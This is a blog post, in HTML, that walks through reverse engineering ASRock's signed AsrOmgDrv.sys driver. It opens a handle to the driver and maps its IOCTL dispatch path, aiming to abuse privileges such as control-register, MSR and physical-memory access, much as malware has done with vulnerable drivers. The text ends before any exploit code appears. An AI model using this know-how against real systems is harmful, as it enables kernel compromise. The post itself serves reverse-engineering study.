<!DOCTYPE html>
<html lang="en-us"><head><script src="/xgtbzblog/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=xgtbzblog/livereload" data-no-instant defer></script><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">Vulnerable Driver Reversal | xgtbzblog</title>
<meta property="og:title" content="Vulnerable Driver Reversal | xgtbzblog" />
<meta name="twitter:title" content="Vulnerable Driver Reversal | xgtbzblog" />
<meta itemprop="name" content="Vulnerable Driver Reversal | xgtbzblog" />
<meta name="application-name" content="Vulnerable Driver Reversal | xgtbzblog" />
<meta property="og:site_name" content="" />

<meta name="description" content="">
<meta itemprop="description" content="" />
<meta property="og:description" content="" />
<meta name="twitter:description" content="" />

<meta property="og:locale" content="en-us" />
<meta name="language" content="en-us" />

  <link rel="alternate" hreflang="en" href="http://localhost:1313/xgtbzblog/posts/vulnerable-driver-reversal/" title="" />



  <meta itemprop="image" content="http://localhost:1313/xgtbzblog/" />
  <meta property="og:image" content="http://localhost:1313/xgtbzblog/" />
  <meta name="twitter:image" content="http://localhost:1313/xgtbzblog/" />
  <meta name="twitter:image:src" content="http://localhost:1313/xgtbzblog/" />




    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2024-04-20T19:15:39&#43;0100 />
    <meta property="article:published_time" content=2024-04-20T19:15:39&#43;0100 />

    

    

    <script defer type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Article",
        "headline": "Vulnerable Driver Reversal",
        "author": {
        "@type": "Person",
        "name": ""
        },
        "datePublished": "2024-04-20",
        "description": "",
        "wordCount":  5506 ,
        "mainEntityOfPage": "True",
        "dateModified": "2024-04-20",
        "image": {
        "@type": "imageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "xgtbzblog"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.123.3">

    

    <link rel="canonical" href="http://localhost:1313/xgtbzblog/posts/vulnerable-driver-reversal/">
    <link href="/xgtbzblog/style.min.18927ce2d0dc33c991e188f9b4efd25929b9589151125f809e2b3f45e447e971.css" rel="stylesheet">
    <link href="/xgtbzblog/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/xgtbzblog/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/xgtbzblog/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/xgtbzblog/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/xgtbzblog/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/xgtbzblog/favicon.ico">




<link rel="manifest" href="http://localhost:1313/xgtbzblog/site.webmanifest">

<meta name="msapplication-config" content="/xgtbzblog/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">

    
    <link rel="icon" type="image/svg+xml" href="/xgtbzblog/icons/favicon.svg">

    </head>
<body data-theme = "" class="notransition">

<script src="/xgtbzblog/js/theme.js"></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="http://localhost:1313/xgtbzblog/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title></title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                🕮 Estimated Reading Time: 26 minutes
                <h1 class="header-title">
                    Vulnerable Driver Reversal
                </h1>
                
                
                <div class="post-meta">
                    <time datetime="2024-04-20T19:15:39&#43;01:00" itemprop="datePublished"> Apr 20, 2024 </time>
                </div>
                
            </header>
            
    
        
            
        
    
    <details class="toc" open>
        <summary><b></b></summary>
        <nav id="TableOfContents">
  <ul>
    <li><a href="#preliminary">Preliminary</a></li>
    <li><a href="#opening-a-handle-to-the-driver">Opening a handle to the driver</a></li>
    <li><a href="#ioctl-internals-summary">IOCTL Internals Summary</a></li>
    <li><a href="#locating-the-devicecontrol-dispatch-routine">Locating the DeviceControl dispatch routine</a></li>
    <li><a href="#making-sense-of-the-arguments-passed-to-the-ioctl-handler">Making sense of the arguments passed to the IOCTL handler</a></li>
    <li><a href="#irp-systembuffer">IRP-&gt;SystemBuffer</a></li>
    <li><a href="#allocate-contiguous-physical-memory">Allocate contiguous physical memory</a></li>
    <li><a href="#free-contiguous-memory">Free Contiguous Memory</a></li>
    <li><a href="#readwrite-control-registers">Read/Write Control Registers</a></li>
    <li><a href="#readwrite-physical-memory">Read/Write Physical Memory</a></li>
    <li><a href="#conclusion">Conclusion</a></li>
  </ul>
</nav>
    </details>
            <div class="page-content">
                <h2 id="preliminary">Preliminary</h2>
<p>Any driver that communicates with a user-mode application is potentially vulnerable. The privileges exposed by a driver through communication are not exclusively limited to a specific user-mode application (unless the driver takes an extra step to validate a specific process, which is rare), therefore they can be reverse engineered, exploited and leveraged by any program running in <code>ring3</code>. In the past, malware developers have exploited vulnerable drivers to manipulate <code>MSRs</code>, allocate <code>RWX</code> memory in the kernel virtual address space to execute shellcode, patch system calls, or even manually map an unsigned driver - this blog post demonstrates nothing new. However, Microsoft is often quick to revoke the signatures of drivers that they consider vulnerable, which may make it problematic to find a working vulnerable driver with a viable signature on the latest versions of windows.</p>
<p>In this blog post, we reverse engineer a working vulnerable driver (Windows 11 23H2) and communicate with it through <code>IOCTL</code> to exploit some of the many privileges it exposes: read/write control registers, manipulate <code>MSRS</code>, allocate/free contiguous physical memory, stall the processor, map physical memory, translate to physical address and more. This blog post makes it easy for a beginner reverse engineer to understand the internals of <code>IOCTL</code> operations &amp; how to reverse communication structures effectively.</p>
<p>The driver we will be reversing in this post is <code>AsrOmgDrv.sys</code>, which was developed by <code>ASRock</code> incorporation. This is a Taiwanese company that manufacture motherboards - so it&rsquo;s no wonder they produce vulnerable drivers.</p>
<h2 id="opening-a-handle-to-the-driver">Opening a handle to the driver</h2>
<p>After loading the signed driver comfortably with <code>NtLoadDriver</code>, our first step is to open a handle to it. In short, a handle is an index that represents an entry on table maintained on a process, by process basis, that points logically to a kernel object residing in kernel space. They are, in essence, a way for <code>ring3</code> applications to indirectly reference kernel objects, and to communicate with this vulnerable driver we must open one. We can do this easily with <code>CreateFile</code>, but we need to find out some information about our vulnerable driver to call this function appropriately, such as it&rsquo;s device name. We can obtain everything we need to complete this call very easily with some basic static analysis, but first you should understand what the device name actually is.</p>
<p>To be able to communicate with a driver through <code>IOCTL</code>, the driver must have setup a device object which allows the OS to interact and communicate with the driver efficiently. According to the documentation, the device object structure represents a logical, virtual, or physical device for which a driver handles <code>I/O</code> requests (communication). This structure contains various fields of useful information that the <code>I/O</code> manager or driver could use when responding to a request made by another component within the system, such as the <code>ReferenceCount</code>, which represents the number of open handles to the device object and is mainly used by the <code>I/O</code> manager, the <code>IRP</code>, which we will look at later, and the <code>DriverObject</code>. Multiple device objects could exist within a system, so they need some unique identifier that can distinguish them from one another. This is where device names come into play, providing a distinctive label for each device object, allowing applications to accurately target and communicate with the desired device/driver. The device name is defined by the driver with a call to <code>IoCreateDevice</code>, so you could quickly gain a pointer to this function from the <code>.idata</code> section and <code>xref</code> to it. We will, however, be starting from the executable entry point.</p>
<p>So we begin our analysis at the executable entry point, which you can navigate to with <code>CRTL + E</code>. We see this routine set up the stack canary and <code>jmp</code> to the original entry point (<code>OEP</code>), where we will be obtaining all of our information required to call <code>CreateFile</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-asm" data-lang="asm"><span style="display:flex;"><span><span style="color:#a6e22e">public</span> <span style="color:#66d9ef">start</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">start</span> <span style="color:#66d9ef">proc</span> <span style="color:#66d9ef">near</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">sub</span>     <span style="color:#66d9ef">rsp</span>, <span style="color:#ae81ff">28</span><span style="color:#66d9ef">h</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">mov</span>     <span style="color:#66d9ef">r8</span>, <span style="color:#66d9ef">rdx</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">mov</span>     <span style="color:#66d9ef">r9</span>, <span style="color:#66d9ef">rcx</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">call</span>    <span style="color:#66d9ef">__security_init_cookie</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">mov</span>     <span style="color:#66d9ef">rdx</span>, <span style="color:#66d9ef">r8</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">mov</span>     <span style="color:#66d9ef">rcx</span>, <span style="color:#66d9ef">r9</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">add</span>     <span style="color:#66d9ef">rsp</span>, <span style="color:#ae81ff">28</span><span style="color:#66d9ef">h</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">jmp</span>     <span style="color:#66d9ef">DriverEntry</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">start</span> <span style="color:#66d9ef">endp</span>
</span></span></code></pre></div><p>The psuedocode generated by IDA shown below shows the initialisation of a unicode string, followed by a subsequent call to <code>IoCreateDevice</code>. The purpose of this <code>DDI</code> is to &ldquo;create a device object for use by a driver&rdquo;, and its 3rd argument is of type <code>UNICODE_STRING</code> - whose purpose is to represent the name of the device object, as we mentioned earlier.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span>RtlInitUnicodeString(<span style="color:#f92672">&amp;</span>DestinationString, aDeviceAsromgdr);
</span></span><span style="display:flex;"><span>RtlInitUnicodeString(<span style="color:#f92672">&amp;</span>v6, aDosdevicesAsro);
</span></span><span style="display:flex;"><span>result <span style="color:#f92672">=</span> IoCreateDevice(DriverObject, <span style="color:#ae81ff">64</span>i64, <span style="color:#f92672">&amp;</span>DestinationString);
</span></span></code></pre></div><p>From this we can reasonably infer that the <code>.data</code> variable, &ldquo;aDeviceAsromgdr&rdquo; holds the name of our device, and its value is shown in disassembly the below.</p>
<pre tabindex="0"><code class="language-masm" data-lang="masm">lea     rdx, aDeviceAsromgdr ; &#34;\\Device\\AsrOmgDrv&#34;
lea     rcx, [rsp+68h+DestinationString] ; DestinationString
call    cs:RtlInitUnicodeString
</code></pre><p>Just like that, we have retrieved the device name and are now ready to open a handle to the driver with CreateFileA, with help from the documentation of course.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span><span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">__int32</span> <span style="color:#a6e22e">open_handle_to_drv</span>(HANDLE<span style="color:#f92672">&amp;</span> DrvHandle) {
</span></span><span style="display:flex;"><span>   DrvHandle <span style="color:#f92672">=</span> CreateFileA(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\\\\</span><span style="color:#e6db74">.</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">AsrOmgDrv&#34;</span>, FILE_ANY_ACCESS, 
</span></span><span style="display:flex;"><span>      <span style="color:#ae81ff">0</span>, <span style="color:#66d9ef">nullptr</span>, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, <span style="color:#66d9ef">nullptr</span>);
</span></span><span style="display:flex;"><span>            
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">return</span> GetLastError();
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><h2 id="ioctl-internals-summary">IOCTL Internals Summary</h2>
<p>Now that we have successfully opened a handle, we could theoretically begin communicating with our driver. But first, we have to understand the basics of <code>IOCTL</code> operations &amp; reverse all the communication structures that we need to talk to our driver meaningfully.</p>
<p><code>IOCTLs</code> are commands used to communicate with device drivers and other kernel-mode software. <code>IOCTL</code> operations are managed by the <code>I/O</code> subsystem in Windows, which consists of several layers of software components, including file systems and device drivers that it uses to do its work.</p>
<p>There are multiple types of <code>IOCTL</code> commands, but within the scope of this blog we will only be focusing on <code>METHOD_BUFFERED</code>, which is conveniently the most common type of command. This type of <code>IOCTL</code> command is used for operations that transfer data between a driver and a user-mode application. The data is passed through a buffer, which can be allocated by the user-mode application or the driver, and can be any size.</p>
<p>Not all drivers are intended for communication, thus not all drivers inherently support <code>IOCTL</code> operations. You can tell if a driver supports <code>IOCTL</code> if it has created a device object, usually with <code>IoCreateDevice</code>, and has established a symbolic link, usually with <code>IoCreateSymbolicLink</code>, which is an indirect reference to the device. Evidently, our driver does both.</p>
<pre tabindex="0"><code class="language-masm" data-lang="masm">call    cs:IoCreateDevice
test    eax, eax
js      loc_160F2
lea     rdx, [rsp + 68h + DestinationString]
lea     rcx, [rsp + 68h + DeviceName]
call    cs:IoCreateSymbolicLink
</code></pre><p>Imagine a driver that provides multiple functionalities, like the one we&rsquo;re currently analysing. How does a user-mode application, when communicating with one of these drivers, specify which functionality they want to be executed? This is where control codes are introduced, and they are used by device drivers to handle different <code>IOCTL</code> operations. These control codes are integral values that specify the operation to be handled by the driver. It is important to note that these codes are driver defined, so we will have to continue reversing to find out what codes map to what operations.</p>
<p>User-mode applications use the <code>DeviceIoControl</code> <code>WINAPI</code> routine to communicate with device drivers. The routine requires that we specify a handle to the device we want to talk to, an application or driver-defined buffer where data will be written to and read from (remember <code>METHOD_BUFFERED</code>), a control code to specify the operation we want to be performed, and the size of these structures.</p>
<p>Now, it&rsquo;s time we understand what happens when a call to <code>DeviceIoControl</code> is made from user-mode at a high level. This will familiarise us with essential structures involved in reversing <code>IOCTL</code> communication.</p>
<ul>
<li>
<p>First, the user-mode input buffer passed to <code>DeviceIoControl</code> is validated with the routine <code>ProbeForRead</code>, which checks if the buffer is properly aligned</p>
</li>
<li>
<p>Then, an <code>IRP</code> is created to represent the <code>I/O</code> request made from the <code>ring3</code> application to the <code>ring0</code> driver.</p>
</li>
<li>
<p>A member of the <code>IRP</code> structure, <code>CurrentStackLocation</code> of type <code>IO_STACK_LOCATION</code>, is initialised to describe the parameters of the request.</p>
</li>
<li>
<p>After all the relevant structures have been correctly setup, it&rsquo;s time for the driver to handle the request, so the <code>IRP</code> is passed to the <code>I/O</code> manager by calling <code>IoCallDriver</code>.</p>
</li>
<li>
<p>At this point, control is handed over to the driver, and it handles the operation based on the control code in it&rsquo;s dispatch routine. We will continue to mention dispatch routines here briefly, but we will look at them more in depth later.</p>
</li>
<li>
<p>The dispatch routine may access the <code>IO_STACK_LOCATION</code> pointed to by the <code>IRP</code> to complete its operation.</p>
</li>
<li>
<p>When the dispatch routine is finished responding to the request, it sets the appropriate status information fields in the <code>IRP</code> to indicate the result of the operation.</p>
</li>
<li>
<p>It then calls <code>IoCompleteRequest</code>, which signals to the <code>I/O</code> manager that it has finished its work.</p>
</li>
<li>
<p><code>DeviceIoControl</code> then copies the output buffer back to the user-mode application, and returns true or false to represent whether the operation completed successfully.</p>
</li>
</ul>
<p>Let&rsquo;s discuss the dispatch routines we mentioned earlier when analysing the control flow of <code>DeviceIoControl</code>. Under the opaque <code>DRIVER_OBJECT</code> structure, there is a field displayed as &ldquo;MajorFunction&rdquo;. This field is a pointer to an array of driver defined functions known as dispatch routines. These dispatch routines are created to handle a specific <code>I/O</code> operation. For example, when a user-mode application calls <code>ReadFile</code> and passes in a handle to a device object, the dispatch routine associated with the <code>ReadFile</code> operation will be executed. We should keep in mind, however, that a single dispatch routine may be used to handle multiple <code>I/O</code> operations, which you will see in the section following this one. Below you can see a list of operations that are handled by dispatch routines, we are interested in <code>DeviceControl</code>.</p>
<table>
<thead>
<tr>
<th>Routine</th>
<th>Code</th>
<th>Operation</th>
</tr>
</thead>
<tbody>
<tr>
<td>CloseHandle</td>
<td>IRP_MJ_CLOSE</td>
<td>Close</td>
</tr>
<tr>
<td>CreateFile</td>
<td>IRP_MJ_CREATE</td>
<td>Create</td>
</tr>
<tr>
<td><strong>DeviceIoControl</strong></td>
<td><strong>IRP_MJ_DEVICE_CONTROL</strong></td>
<td><strong>DeviceControl</strong></td>
</tr>
<tr>
<td>ReadFile</td>
<td>IRP_MJ_READ</td>
<td>Read</td>
</tr>
<tr>
<td>WriteFile</td>
<td>IRP_MJ_WRITE</td>
<td>Write</td>
</tr>
</tbody>
</table>
<p>So now you should understand step 5 of <code>DeviceIoControl</code> better - the control flow was passed to the dispatch routine responsible for responding to <code>DeviceControl</code> requests. Now you have a fundamental understanding of <code>IOCTL</code>, we can start our journey on cracking the control codes &amp; communication structures.</p>
<h2 id="locating-the-devicecontrol-dispatch-routine">Locating the DeviceControl dispatch routine</h2>
<p>Getting a pointer to the <code>DeviceControl</code> dispatch routine is extremely easy. Given that the <code>IRP_MJ_DEVICE_CONTROL</code> constant is of value 0xE (meaning the <code>DeviceControl</code> dispatch routine is index 14 in the MajorFunction array), and that the start of the <code>MajorFunction</code> array is 0x70 bytes from the DriverObject, <strong>we can say that: offset_from_driver_object - 0x70 = 0x70, because 0x70 / sizeof(unsigned long long) = 0xE</strong> . Therefore, <strong>0x70 + 0x70 = offset_from_driver_object (0xE0)</strong>. We divide 0x70 from sizeof(unsigned long long), because each entry in the array is a pointer that occupies 8 bytes in memory.</p>
<p>Still within the <code>OEP</code>, we can easily distinguish the <code>DeviceControl</code> dispatch routine from other dispatch routines now that we know the offset - the function being written to <strong><code>DriverObject</code> + 0xE0</strong>. The psuedocode below also depicts how a single dispatch routine can be used to handle multiple I/O operations, as described earlier.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> (NT_SUCCESS(IoCreateSymbolicLink(<span style="color:#f92672">&amp;</span>devincename, <span style="color:#f92672">&amp;</span>DestinationString)))
</span></span><span style="display:flex;"><span>  {
</span></span><span style="display:flex;"><span>     <span style="color:#75715e">// same dispatch routine for two of the same I/O operations
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>     <span style="color:#f92672">*</span>(_QWORD <span style="color:#f92672">*</span>)(DriverObject <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x70</span>) <span style="color:#f92672">=</span> DispatchRoutine_1;
</span></span><span style="display:flex;"><span>     <span style="color:#f92672">*</span>(_QWORD <span style="color:#f92672">*</span>)(DriverObject <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x80</span>) <span style="color:#f92672">=</span> DispatchRoutine_1;
</span></span><span style="display:flex;"><span>      
</span></span><span style="display:flex;"><span>     <span style="color:#f92672">*</span>(_QWORD <span style="color:#f92672">*</span>)(DriverObject <span style="color:#f92672">+</span> <span style="color:#ae81ff">0xE0</span>) <span style="color:#f92672">=</span> ioctl_routine; <span style="color:#75715e">// offset 0xE0
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>      
</span></span><span style="display:flex;"><span>     <span style="color:#75715e">// this is NOT a dispatch routine &amp; is for unloading the driver
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>     <span style="color:#75715e">// it is not important in this blog
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>     <span style="color:#f92672">*</span>(_QWORD <span style="color:#f92672">*</span>)(DriverObject <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x68</span>) <span style="color:#f92672">=</span> DriverUnload; 
</span></span></code></pre></div><h2 id="making-sense-of-the-arguments-passed-to-the-ioctl-handler">Making sense of the arguments passed to the IOCTL handler</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span><span style="color:#66d9ef">uint64_t</span> <span style="color:#66d9ef">__fastcall</span> ioctl_routine(<span style="color:#66d9ef">uint64_t</span> a1, <span style="color:#66d9ef">uint64_t</span> a2)
</span></span></code></pre></div><p>So now it&rsquo;s finally time to end our analysis of the <code>OEP</code> and move into the dispatch routine that is invoked when we make a call to <code>DeviceIoControl</code>. We know that this is <code>IOCTLRoutine</code> from the code snippet above. The first step we should take is using logic to determine the meaning of the arguments passed to this routine. If we <code>xref</code> to this function, we&rsquo;ll find that it is only referenced when it is being written to the <code>MajorFunction</code> array, so we can only the reconstruct the real structures of these arguments from their use within the function, but before we do this, you should be introduced to the <code>SystemBuffer</code> field under the <code>IRP</code>.</p>
<h2 id="irp-systembuffer">IRP-&gt;SystemBuffer</h2>
<p>The <code>SystemBuffer</code> field under the <code>IRP</code> structure is used to hold the buffer for the current <code>I/O</code> operation during <code>METHOD_BUFFERED</code> <code>IOCTL</code> commands. This field is <code>0x18</code> bytes down the <code>IRP</code>, and if we look for references to <code>a2</code> (second argument) within the function, we can see that this offset is added to it. To assume that <code>a2</code> is of type <code>IRP</code> because <code>0x18</code> is added to it seems ludicrous at first, but we will do so because it&rsquo;s normal for the <code>IRP</code> to be passed to the <code>DeviceControl</code> dispatch routine (remember <code>DeviceIoControl</code> control flow analysis). This assumption is solidified when we look at other instances where <code>a2</code> is referenced, so we will re-name this &lsquo;Irp&rsquo;. Now, we can decipher other structures using our hypothesis that <code>a2</code> is the Irp.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span>  IoStackLocation <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>(<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span> <span style="color:#f92672">*</span>)(Irp <span style="color:#f92672">+</span> <span style="color:#ae81ff">0xB8</span>);
</span></span><span style="display:flex;"><span>  SystemBuffer <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>(<span style="color:#66d9ef">int</span> <span style="color:#f92672">**</span>)(Irp <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x18</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">*</span>(<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> <span style="color:#f92672">*</span>)(Irp <span style="color:#f92672">+</span> <span style="color:#ae81ff">48</span>) <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">*</span>(<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span> <span style="color:#f92672">*</span>)(Irp <span style="color:#f92672">+</span> <span style="color:#ae81ff">56</span>) <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>i64;
</span></span><span style="display:flex;"><span>  v4 <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>(<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span> <span style="color:#f92672">*</span>)(a1 <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x40</span>);
</span></span><span style="display:flex;"><span>  ControlCode <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>(<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> <span style="color:#f92672">*</span>)(IoStackLocation <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x18</span>);
</span></span><span style="display:flex;"><span>  
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> ( <span style="color:#f92672">*</span>(<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)IoStackLocation <span style="color:#f92672">!=</span> <span style="color:#ae81ff">14</span> )
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">goto</span> LABEL_132;
</span></span></code></pre></div><p>Below is the psuedocode cleaned up, so you can understand more clearly.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span><span style="color:#75715e">#define IRP_MJ_DEVICE_CONTROL 0xE
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>IoStackLocation <span style="color:#f92672">=</span> Irp<span style="color:#f92672">-&gt;</span>CurrentStackLocation;
</span></span><span style="display:flex;"><span>SystemBuffer <span style="color:#f92672">=</span> Irp<span style="color:#f92672">-&gt;</span>SystemBuffer;
</span></span><span style="display:flex;"><span>Irp<span style="color:#f92672">-&gt;</span>IoStatus<span style="color:#f92672">-&gt;</span>Status <span style="color:#f92672">=</span> NULL;
</span></span><span style="display:flex;"><span>Irp<span style="color:#f92672">-&gt;</span>IoStatus<span style="color:#f92672">-&gt;</span>Information <span style="color:#f92672">=</span> NULL;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>v4 <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>(QWORD<span style="color:#f92672">*</span>)(a1 <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x40</span>); <span style="color:#75715e">// Yet to be determined
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>ControlCode <span style="color:#f92672">=</span> IoStackLocation<span style="color:#f92672">-&gt;</span>IoControlCode;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">/* Here we check if the I/O operation is for DeviceControl, 
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">if it isn&#39;t we jmp to a location we will analyse later */</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> (IoStackLocation<span style="color:#f92672">-&gt;</span>MajorFunction <span style="color:#f92672">!=</span> IRP_MJ_DEVICE_CONTROL) <span style="color:#66d9ef">goto</span> LABEL_132;
</span></span></code></pre></div><p>Now we have all the information to begin constructing our communication buffers, so we will ignore <code>a1</code>. From experience, this is usually the <code>DEVICE_OBJECT</code> structure. This is where things get interesting - we will now start looking at the first vulnerability exposed by this driver.</p>
